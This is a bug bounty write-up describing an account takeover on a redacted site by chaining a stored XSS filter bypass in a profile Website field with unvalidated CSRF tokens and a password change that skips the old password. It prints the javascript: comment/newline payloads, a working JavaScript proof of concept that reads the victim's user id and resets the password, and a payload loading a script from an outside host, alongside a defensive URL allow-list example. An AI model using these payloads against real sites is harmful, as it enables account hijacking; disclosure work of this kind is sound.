XSS + CSRF = Bhoom!

Hello :D Everyone,

It had been a long time since I got a good bug and a bounty too :3 so after an OWASP meet where I met many leet bounty hunters I felt very motivated to do a bug hunt. I started poking around, and this is the story of a simple full account takeover on an h1 private site.

Reported To: ****************
Types: Cross-Site Request Forgery (CSRF), Cross-Site Scripting (XSS)
1. Stored XSS (Requires Interaction)
 I found an XSS on the main domain in the Website field of the user's profile. I tried javascript:alert(1) to check whether JavaScript could be executed, but it was detected as invalid, so I modified the payload to javascript://http://google.com/?aaaa%0aalert(1) and it worked! For those who don't know:

javascript:              - JavaScript's pseudo protocol/scheme
//                       - begins a single-line comment in JS
https://google.com/?aaaa - the comment itself
%0a                      - a URL-encoded newline, which ends the single-line comment
alert(1)                 - a valid, predefined JavaScript function

So it got saved on my profile. But it required the victim to click the attacker's website link, which meant sending him the attacker's profile page (publicly accessible), so that's how I got a simple XSS with an easy bypass. Before reporting, I decided to go further and played around a little more, and found that the "Change Password" functionality doesn't ask for the user's old password. Well, that was pretty awesome to exploit :D together with the XSS we found.
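As an added example (not code from the original post), here is the allow-list check the Website field should have had: the value is parsed as a URL and only the http and https schemes are accepted, so the comment/newline payload above is rejected for the same reason the plain one is. The naiveCheck function is a constructed stand-in for a substring filter and an assumption about how the site's check behaved, not its actual code.

```javascript
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Returns the normalised URL when the value may be stored and rendered as
// an href, or null when it must be rejected.
function validateWebsite(value) {
  if (typeof value !== "string" || value.length > 2048) return null;
  let url;
  try {
    // The WHATWG parser drops leading/trailing C0 controls and embedded
    // tab/newline, so " javascript:" and "java\tscript:" both normalise to
    // the javascript: scheme instead of slipping past a string match.
    url = new URL(value);           // throws on schemeless or relative input
  } catch (e) {
    return null;
  }
  // Allow-list the scheme; everything else (javascript:, data:, vbscript:,
  // file:) is rejected whatever follows the colon.
  if (!ALLOWED_SCHEMES.has(url.protocol)) return null;
  if (url.hostname === "") return null; // belt and braces: never an empty host
  return url.href;
}

// Constructed stand-in (an assumption, not the site's code) for a substring
// filter: it blocks the first payload from the post but not the
// comment/newline variant, because only the scheme matters, not what follows.
function naiveCheck(value) {
  return !/^javascript:alert/i.test(value);
}

// Constructed inputs, including the two payloads quoted in the post.
const SAMPLES = [
  "https://google.com/",
  "javascript:alert(1)",
  "javascript://http://google.com/?aaaa%0aalert(1)",
  " javascript:alert(1)",
  "java\tscript:alert(1)",
  "data:text/html,<script>alert(1)</script>",
  "google.com",
];
for (const s of SAMPLES) {
  console.log(JSON.stringify(s), "naive:", naiveCheck(s), "allow-list:", validateWebsite(s));
}
```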


2. CSRF Bypass
 Even though I had an XSS, I decided to check whether an anti-CSRF token was there (not strictly needed, since we could grab the token with the XSS using XHR). I wanted to see if the CSRF token was being validated on the server side, so all I did was remove the authenticity_token parameter from the form :D and boom! it got updated without it.

3. Full Account Takeover
So, combining the XSS and the missing confirmation of the user's old password, I created a PoC that takes over the victim's account with just a click on the attacker's profile website link. All we need is for the victim to be logged into his account.

Earlier, while changing the password, I saw that the form was submitted to an endpoint containing a unique user id that was not publicly known:
https://www.******.com/users/{UNIQUE ID}
So we just needed to grab the user id, and since the CSRF token is not validated we don't need to grab that.

So I made an XHR request to /account (various other endpoints also contained the user_id in their source) to find the victim's user_id, grabbed it, and submitted the password-change form with that user_id.

I hosted this JavaScript on an HTTPS domain:
var http = new XMLHttpRequest();
http.open("GET", "https://www.*******.com/account", true);
http.send();
http.onload = function () {
    if (http.status !== 200) return;
    // Parse the fetched /account page and take the victim's user id from the
    // id attribute of the edit form ("edit_user_<id>").
    var dom = new DOMParser().parseFromString(http.responseText, 'text/html');
    var user_id = dom.getElementsByClassName('edit_user')[0].id.split('_')[2];

    // The form is built inside the onload handler: the request is
    // asynchronous, so user_id is only known here. No authenticity_token is
    // sent, because the server did not validate it.
    var f = document.createElement('form');
    var i1 = document.createElement('input');
    var i2 = document.createElement('input');
    var i3 = document.createElement('input');
    var i4 = document.createElement('input');
    var i5 = document.createElement('input');
    f.action = "https://www.********.com/users/" + user_id;
    f.className = "edit_user";
    f.id = "edit_user_" + user_id;
    f.method = "POST";
    i1.name = "utf8";                 // hidden fields copied from the real form
    i1.type = "hidden";
    i1.value = "✓";
    i2.name = "_method";              // tunnels the PUT over a POST
    i2.type = "hidden";
    i2.value = "put";
    i3.id = "page";
    i3.name = "page";
    i3.type = "hidden";
    i3.value = "password";
    i4.id = "user_password";          // the new password; no old one is asked for
    i4.name = "user[password]";
    i4.value = "my1337pass";
    i4.type = "password";
    i5.className = "button";
    i5.name = "commit";
    i5.type = "submit";
    f.appendChild(i1);
    f.appendChild(i2);
    f.appendChild(i3);
    f.appendChild(i4);
    f.appendChild(i5);
    document.body.appendChild(f);     // a form must be in the document to submit
    f.submit();
};

and entered

 javascript://http://google.com.?a%0avar x=document.createElement('script');x.src='https://myhost/script.js';document.body.appendChild(x);

in the website URL field and updated my (attacker's) profile.



Now all the victim had to do was click on the attacker's website link and BOOM! his password got changed to 'my1337pass'.


I got a fair enough bounty :D.

Thanks to all the awesome infosec people who share their knowledge.

14 comments:

  1. bug bounty gawd, h1 private site

  2. Amazing PoC dude! Thanks for sharing!

    https://twitter.com/knowledge_2014

    best regards
    ak1t4

  3. I am confused: javascript://http://google.com/?aaaa%0aalert(1)
    this payload still runs and works for many domains. What is this?
